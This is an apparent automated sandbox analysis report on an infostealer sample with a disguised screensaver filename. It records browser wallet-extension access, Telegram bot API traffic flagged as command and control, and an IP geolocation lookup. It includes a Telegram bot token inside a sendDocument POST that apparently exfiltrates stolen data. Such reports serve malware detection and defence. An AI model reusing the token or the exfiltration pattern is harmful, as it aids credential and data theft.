Source:	Binary string: D:\a\1\b\bin\amd64\_sqlite3.pdb source: #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000002.2341133552.00007FF8B8CD1000.00000040.00000001.01000000.0000000B.sdmp
Source:	Binary string: D:\a\1\b\libssl-3.pdb source: #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000002.2339702487.00007FF8A9355000.00000040.00000001.01000000.00000011.sdmp
Source:	Binary string: api-ms-win-crt-heap-l1-1-0.pdb source: #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2038117369.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: api-ms-win-crt-string-l1-1-0.pdb source: #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2038707513.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: D:\a\1\b\bin\amd64\_ssl.pdb source: #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000002.2340532745.00007FF8B8B11000.00000040.00000001.01000000.0000000F.sdmp

Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe	Code function: 0_2_00007FF73AE27E4C _invalid_parameter_noinfo,FindFirstFileExW,GetLastError,_invalid_parameter_noinfo,FindNextFileW,GetLastError,	0_2_00007FF73AE27E4C
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe	Code function: 0_2_00007FF73AE27E4C _invalid_parameter_noinfo,FindFirstFileExW,GetLastError,_invalid_parameter_noinfo,FindNextFileW,GetLastError,	0_2_00007FF73AE27E4C
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe	Code function: 0_2_00007FF73AE188D0 FindFirstFileExW,FindClose,	0_2_00007FF73AE188D0
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe	Code function: 0_2_00007FF73AE31EE4 _invalid_parameter_noinfo,FindFirstFileExW,FindNextFileW,FindClose,FindClose,	0_2_00007FF73AE31EE4
Source: C:\Users\user\AppData\Local\Temp\_MEI17882\rar.exe	Code function: 68_2_00007FF7F7EA46EC FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,	68_2_00007FF7F7EA46EC
Source: C:\Users\user\AppData\Local\Temp\_MEI17882\rar.exe	Code function: 68_2_00007FF7F7EE88E0 FindFirstFileExA,	68_2_00007FF7F7EE88E0
Source: C:\Users\user\AppData\Local\Temp\_MEI17882\rar.exe	Code function: 68_2_00007FF7F7E9E21C FindFirstFileW,FindClose,CreateFileW,DeviceIoControl,CloseHandle,	68_2_00007FF7F7E9E21C

Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\	Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\	Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\	Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\	Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\	Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\af\	Jump to behavior

Networking

Uses the Telegram API (likely for C&C communication)

Source: unknown

DNS query: name: api.telegram.org

Source: Joe Sandbox View	IP Address: 208.95.112.1 208.95.112.1
Source: Joe Sandbox View	IP Address: 149.154.167.220 149.154.167.220

Source: Joe Sandbox View

ASN Name: TELEGRAMRU TELEGRAMRU

Source: unknown

DNS query: name: ip-api.com

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic

HTTP traffic detected: GET /json/?fields=225545 HTTP/1.1Host: ip-api.comAccept-Encoding: identityUser-Agent: python-urllib3/2.1.0

Source: #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000002.2330934466.0000028C88208000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: `https://www.facebook.com/ equals www.facebook.com (Facebook)
Source: #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000002.2330934466.0000028C88208000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: `https://www.youtube.com/ equals www.youtube.com (Youtube)

Source: global traffic	DNS traffic detected: DNS query: ip-api.com
Source: global traffic	DNS traffic detected: DNS query: api.telegram.org

Source: unknown

HTTP traffic detected: POST /bot6932251862:AAHJgssLa4FQxIPJOSZL101THMOx2PWVwSE/sendDocument HTTP/1.1Host: api.telegram.orgAccept-Encoding: identityContent-Length: 692816User-Agent: python-urllib3/2.1.0Content-Type: multipart/form-data; boundary=6d93bc963fb1d0e6724c699c271a2303

Source: #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2040742387.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digi
Source: #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2041104820.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2042909763.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2040242282.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.co
Source: #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2042073233.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2033391617.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2033733200.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2033990521.000001CCD86D0000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2042177471.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2041104820.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2034348641.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2042073233.000001CCD86D0000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2033839925.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2042909763.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2034111679.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2040742387.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2034224665.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2033990521.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2033195251.000001CCD86C3000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2040242282.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2040865247.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2033558347.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
Source: #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2042073233.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2033391617.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2033733200.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2042177471.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2041104820.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2034348641.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2033839925.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2042909763.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2034111679.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2040742387.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2034224665.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2033990521.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2033195251.000001CCD86C3000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2040242282.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2040865247.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2033558347.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crt0
Source: #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2042073233.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2033391617.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2033733200.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2042177471.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2041104820.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2034348641.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2033839925.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2042909763.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2034111679.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2040742387.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2034224665.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2033990521.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2033195251.000001CCD86C3000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2040242282.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2040865247.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2033558347.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
Source: #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2042073233.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2033391617.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2033733200.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2033990521.000001CCD86D0000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2042177471.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2041104820.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2034348641.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2042073233.000001CCD86D0000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2033839925.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2042909763.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2034111679.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2040742387.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2034224665.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2033990521.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2033195251.000001CCD86C3000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2040242282.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2040865247.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2033558347.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
Source: #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000002.2344600266.000001CCD86BE000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2344137024.000001CCD86BE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.0
Source: #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2041680595.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000002.2344600266.000001CCD86BE000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2344137024.000001CCD86BE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl04
Source: #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2324232079.0000028C87D37000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2104256267.0000028C87B77000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2122461107.0000028C87B74000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000002.2329026765.0000028C87B86000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2321848291.0000028C87DCA000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2322690660.0000028C87B63000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2154463139.0000028C87B74000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000002.2330228467.0000028C87DCA000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2115215405.0000028C87D18000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2083926352.0000028C87B75000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2324666281.0000028C87B77000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2152267676.0000028C87D36000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2326023533.0000028C87B85000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2323296128.0000028C87B76000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2281491493.000001619A0F0000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000029.00000002.2196248923.00000153734EA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
Source: #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2323026473.0000028C87C1F000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2322690660.0000028C87BFE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.comodoca.com/j
Source: powershell.exe, 00000029.00000002.2198300195.0000015373670000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.microsoft
Source: #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2041680595.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.sectigo.com/SectigoRSACodeSigningCA.crl0s
Source: #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2041680595.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.thawte.com/ThawteTimestampingCA.crl0
Source: #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2042073233.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2033391617.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2033733200.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2033990521.000001CCD86D0000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2042177471.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2041104820.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2034348641.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2042073233.000001CCD86D0000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2033839925.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2042909763.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2034111679.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2040742387.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2034224665.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2033990521.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2033195251.000001CCD86C3000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2040242282.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2040865247.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2033558347.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
Source: #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2042073233.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2033391617.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2033733200.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2042177471.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2041104820.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2034348641.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2033839925.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2042909763.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2034111679.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2040742387.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2034224665.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2033990521.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2033195251.000001CCD86C3000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2040242282.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2040865247.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2033558347.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0S
Source: #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2042073233.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2033391617.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2033733200.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2041104820.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2034348641.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2033839925.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2042909763.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2034111679.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2040742387.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2034224665.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2033990521.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2033195251.000001CCD86C3000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2040242282.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2040865247.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2033558347.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
Source: #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2042177471.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingF
Source: #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2042177471.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingxt
Source: #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2042177471.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingxtsqlite3_value_text16sqlite3_val
Source: #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2033558347.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
Source: #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2042073233.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2033391617.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2033733200.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2042177471.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2041104820.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2034348641.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2033839925.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2042909763.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2034111679.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2040742387.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2034224665.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2033990521.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2033195251.000001CCD86C3000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2040242282.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp, 